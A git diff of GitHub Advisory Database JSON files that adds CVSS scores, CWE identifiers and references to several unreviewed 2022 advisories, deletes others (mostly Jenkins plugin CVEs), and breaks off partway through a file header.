b/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json index 05a0640ae7212..57ddc916174d9 100644 --- a/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json +++ b/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6pr6-q53r-2q97", - "modified": "2022-05-24T17:33:17Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-05-24T17:33:17Z", "aliases": [ "CVE-2020-15708" ], "details": "Ubuntu's packaging of libvirt in 20.04 LTS created a control socket with world read and write permissions. An attacker could use this to overwrite arbitrary files or execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json b/advisories/unreviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json deleted file mode 100644 index 2ef10b27304b2..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6q4p-jrjv-44gf", - "modified": "2023-02-02T21:34:15Z", - "published": "2022-05-24T16:52:46Z", - "aliases": [ - "CVE-2019-10386" - ], - "details": "A cross-site request forgery vulnerability in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10386" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json b/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json index 01e81c966d924..61c41569352e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json +++ b/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6q78-w5mw-hqpj", - "modified": "2022-05-24T19:15:38Z", + "modified": "2024-02-07T18:30:26Z", "published": "2022-05-24T19:15:38Z", "aliases": [ "CVE-2021-34699" ], "details": "A vulnerability in the TrustSec CLI parser of Cisco IOS and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. This vulnerability is due to an improper interaction between the web UI and the CLI parser. An attacker could exploit this vulnerability by requesting a particular CLI command to be run through the web UI. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } ], "affected": [ @@ -25,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-435", "CWE-436" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json b/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json index 091478755605b..0d7815c34225b 100644 --- a/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json +++ b/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json @@ -17,6 +17,10 @@ ], "references": [ + { + "type": "WEB", + "url": "https://github.com/orangecertcc/security-research/security/advisories/GHSA-f49v-45qp-cv53" + }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7550" diff --git a/advisories/unreviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json b/advisories/unreviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json deleted file mode 100644 index b1d5153e3292d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6x52-88cq-55q5", - "modified": "2022-05-24T17:17:13Z", - "published": "2022-05-24T17:17:13Z", - "aliases": [ - "CVE-2020-12439" - ], - "details": "Grin before 3.1.0 allows attackers to adversely affect availability of data on a Mimblewimble blockchain.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12439" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin/issues/3235" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin/pull/3236" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-12439.md" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-05-05T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json b/advisories/unreviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json deleted file mode 100644 index 7d4382adb9b3d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-745w-v492-4fj5", - "modified": "2023-10-25T18:31:23Z", - "published": "2022-05-24T16:50:04Z", - "aliases": [ - "CVE-2019-10342" - ], - "details": "A missing permission check in Jenkins Docker Plugin 1.1.6 and earlier in various 'fillCredentialsIdItems' methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10342" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1400" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/07/11/4" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/109156" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-07-11T14:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json b/advisories/unreviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json deleted file mode 100644 index 525708caee335..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-74c2-965q-mqjw", - "modified": "2023-10-25T18:31:29Z", - "published": "2022-05-24T16:58:50Z", - "aliases": [ - "CVE-2019-10457" - ], - "details": "A missing permission check in Jenkins Oracle Cloud Infrastructure Compute Classic Plugin allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10457" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-10-16/#SECURITY-1462" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/10/16/6" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-10-16T14:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json b/advisories/unreviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json deleted file mode 100644 index e5ffba6bced37..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7577-f8fp-5977", - "modified": "2022-05-14T02:57:57Z", - "published": "2022-05-14T02:57:57Z", - "aliases": [ - "CVE-2018-1999029" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins Shelve Project Plugin 1.5 and earlier in ShelveProjectAction/index.jelly, ShelvedProjectsAction/index.jelly that allows attackers with Job/Configure permission to define JavaScript that would be executed in another user's browser when that other user performs some UI actions.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999029" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-1001" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-01T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json b/advisories/unreviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json deleted file mode 100644 index 57d107e220560..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-774g-r3fm-4v85", - "modified": "2022-05-17T00:29:02Z", - "published": "2022-05-17T00:29:02Z", - "aliases": [ - "CVE-2017-1000090" - ], - "details": "Role-based Authorization Strategy Plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks. This allowed attackers to add administrator role to any user, or to remove the authorization configuration, preventing legitimate access to Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000090" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json b/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json index 0883f49ce4480..38b3f7287034b 100644 --- a/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json +++ b/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-777c-wmxv-2wcq", - "modified": "2022-05-13T01:07:44Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-13T01:07:44Z", "aliases": [ "CVE-2010-3328" ], "details": "Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka \"Uninitialized Memory Corruption Vulnerability.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json b/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json index 143d6bcd8b202..23cfadeb76d9a 100644 --- a/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json +++ b/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-77fh-vc7f-w685", - "modified": "2022-05-01T02:05:40Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:05:40Z", "aliases": [ "CVE-2005-2182" ], "details": "Grandstream BudgeTone (BT) 100 Voice over IP (VoIP) phones do not properly check the Call-ID, branch, and tag values in a NOTIFY message to verify a subscription, which allows remote attackers to spoof messages such as the \"Messages waiting\" message.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-347" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json b/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json index ad175efb072ba..db9e55a9874f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json +++ b/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-79mr-p6x2-hw9g", - "modified": "2022-05-17T05:34:15Z", + "modified": "2024-02-08T21:30:32Z", "published": "2022-05-17T05:34:15Z", "aliases": [ "CVE-2010-1637" ], "details": "The Mail Fetch plugin in SquirrelMail 1.4.20 and earlier allows remote authenticated users to bypass firewall restrictions and use SquirrelMail as a proxy to scan internal networks via a modified POP3 port number.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -101,7 +104,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json b/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json index d95eae8205f87..bbfe764bdad61 100644 --- a/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json +++ b/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json @@ -41,7 +41,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json b/advisories/unreviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json deleted file mode 100644 index a03a3c6c2ae4d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json +++ /dev/null @@ -1,62 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7f6w-fhmr-j8hq", - "modified": "2022-05-17T00:50:19Z", - "published": "2022-05-17T00:50:19Z", - "aliases": [ - "CVE-2014-9635" - ], - "details": "Jenkins before 1.586 does not set the HttpOnly flag in a Set-Cookie header for session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to obtain potentially sensitive information via script access to cookies.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9635" - }, - { - "type": "WEB", - "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185151" - }, - { - "type": "WEB", - "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" - }, - { - "type": "WEB", - "url": "https://jenkins.io/changelog-old/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/72054" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-09-12T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json b/advisories/unreviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json deleted file mode 100644 index 9de5b8378fcf5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7gfc-2v6g-6w9f", - "modified": "2022-05-17T05:45:29Z", - "published": "2022-05-17T05:45:29Z", - "aliases": [ - "CVE-2010-2477" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in the paste.httpexceptions implementation in Paste before 1.7.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving a 404 status code, related to (1) paste.urlparser.StaticURLParser, (2) paste.urlparser.PkgResourcesParser, (3) paste.urlmap.URLMap, and (4) HTTPNotFound.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2477" - }, - { - "type": "WEB", - "url": "http://bitbucket.org/ianb/paste/changeset/fcae59df8b56" - }, - { - "type": "WEB", - "url": "http://groups.google.com/group/paste-users/browse_thread/thread/3b3fff3dadd0b1e5?pli=1" - }, - { - "type": "WEB", - "url": "http://groups.google.com/group/pylons-discuss/msg/8c256dc076a408d8?dmode=source&output=gplain" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127785414818815&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127792576822169&w=2" - }, - { - "type": "WEB", - "url": "http://pylonshq.com/articles/archives/2010/6/paste_174_released_addresses_xss_security_hole" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/42500" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/41160" - }, - { - "type": "WEB", - "url": "http://www.ubuntu.com/usn/USN-1026-1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-11-06T00:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json b/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json index ed6ac0e241029..7df606b4b480d 100644 --- a/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json +++ b/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7hqx-w6mq-g592", - "modified": "2022-05-24T16:53:50Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-24T16:53:50Z", "aliases": [ "CVE-2019-15118" ], "details": "check_input_term in sound/usb/mixer.c in the Linux kernel through 5.2.9 mishandles recursion, leading to kernel stack exhaustion.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -30,6 +33,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/lkml/20190815043554.16623-1-benquike%40gmail.com/" + }, { "type": "WEB", "url": "https://lore.kernel.org/lkml/20190815043554.16623-1-benquike@gmail.com/" @@ -85,7 +92,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-674" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json b/advisories/unreviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json deleted file mode 100644 index 07eaf25d7878b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7m2x-qhrq-rp8h", - "modified": "2023-02-28T15:30:22Z", - "published": "2022-05-24T17:18:38Z", - "aliases": [ - "CVE-2020-13430" - ], - "details": "Grafana before 7.0.0 allows tag value XSS via the OpenTSDB datasource.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13430" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/pull/24539" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/releases/tag/v7.0.0" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200528-0003/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-05-24T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json b/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json index 19447fcafa212..9ecec47ab09c8 100644 --- a/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json +++ b/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7mv6-r5f6-w598", - "modified": "2022-05-01T01:49:47Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-05-01T01:49:47Z", "aliases": [ "CVE-2005-0490" ], "details": "Multiple stack-based buffer overflows in libcURL and cURL 7.12.1, and possibly other versions, allow remote malicious web servers to execute arbitrary code via base64 encoded replies that exceed the intended buffer lengths when decoded, which is not properly handled by (1) the Curl_input_ntlm function in http_ntlm.c during NTLM authentication or (2) the Curl_krb_kauth and krb4_auth functions in krb4.c during Kerberos authentication.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -69,7 +72,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json b/advisories/unreviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json deleted file mode 100644 index bed7877c08a8e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7mvg-cx9c-r6jm", - "modified": "2023-10-25T18:31:20Z", - "published": "2022-05-24T16:44:55Z", - "aliases": [ - "CVE-2019-10312" - ], - "details": "A missing permission check in Jenkins Ansible Tower Plugin 0.9.1 and earlier in the TowerInstallation.TowerInstallationDescriptor#doFillTowerCredentialsIdItems method allowed attackers with Overall/Read permission to enumerate credentials ID of credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10312" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-30/#SECURITY-1355" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/30/5" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/108159" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-30T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json b/advisories/unreviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json deleted file mode 100644 index d637b0509788d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7p4p-v6hr-gp3m", - "modified": "2022-05-14T03:13:12Z", - "published": "2022-05-14T03:13:12Z", - "aliases": [ - "CVE-2018-1000196" - ], - "details": "A exposure of sensitive information vulnerability exists in Jenkins Gitlab Hook Plugin 1.4.2 and older in gitlab_notifier.rb, views/gitlab_notifier/global.erb that allows attackers with local Jenkins master file system access or control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured Gitlab token.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000196" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-263" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json b/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json index dacfdd41f27d0..e7e98c8f3e282 100644 --- a/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json +++ b/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json @@ -173,7 +173,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-362" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json b/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json index df8f583a49cec..ca48e9831d143 100644 --- a/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json +++ b/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json @@ -65,6 +65,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-78", "CWE-94" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json b/advisories/unreviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json deleted file mode 100644 index 